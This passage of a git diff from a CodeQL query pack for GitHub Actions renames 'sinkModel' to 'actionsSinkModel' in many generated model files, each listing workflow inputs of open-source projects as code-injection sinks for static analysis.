a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml index d8f782746230..5fae95e5defb 100644 --- a/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml +++ b/ql/lib/ext/generated/composite-actions/vercel_turbo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vercel/turbo", "*", "input.extra-flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml index f539135bba01..4115d6c98f71 100644 --- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492d..536b37131c17 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed50..54f72118d870 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658b..bed9ae53110e 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816f..7e9f4e14e857 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6deb..3a16fc74bb68 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298f..686f1013dd81 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812b..6a6cb61c1745 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f1..513cd4d76446 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c5..2855a6d4e01d 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27d..78a2cc4e0ced 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de3..8db73d2fc779 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e785..8b0deda070d9 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d695..3f7a7e7fda80 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5d..9746a1186913 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68beb..6208645b1b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3a..e66e7326701e 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff0..471ce3a672a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf1..1af30be9f358 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9ef..ee3d9d0a8eff 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445d..493594e3b81a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c8..a437581ba83a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184f..489e005cc0ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d747..3a0e723e9f70 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d1..893be8a27259 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c9..75877fa48aa7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fea..489e6134eba4 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739eb..4feef931f71e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab831..189cd8bbafdc 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569db..418694a596d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26aa..10c4f8a3e3c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d4..1837a505499e 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71dd..094e4602e8e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae383..ec264f96bf16 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d6..7463396b1522 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f45..4c52a10d4f1d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a6..a6c5a8b8e3bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899b..286e75fc9e20 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a9..9ea5a9a34c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b3803..34e41e9c589d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d05..cc38156973bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc695405..748287e75f82 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae6..703a138d28d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3ae..97f1bafd1f38 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b1..064c946363f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,7 +1,7 @@ 